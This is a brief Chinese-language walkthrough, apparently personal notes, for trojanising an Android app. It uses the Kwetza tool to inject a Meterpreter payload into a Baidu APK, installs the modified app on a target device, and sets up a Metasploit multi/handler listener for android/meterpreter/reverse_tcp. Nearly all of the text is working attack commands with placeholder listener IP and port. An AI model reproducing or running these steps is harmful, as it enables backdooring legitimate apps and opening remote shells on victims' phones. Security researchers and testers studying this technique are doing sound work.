參考:https://www.youtube.com/watch?v=sP8CtMPAwzY
https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
cd /tmp
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 監(jiān)聽者IP 監(jiān)聽端口 yes
#這里選取了百度的apk文件做測試
隨便輸入一個密碼
得到新生成的apk文件
將注入完成的apk文件安裝在目標設(shè)備
也可以本機
xdg-open baidu.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 監(jiān)聽者IP
set lport 監(jiān)聽端口
exploit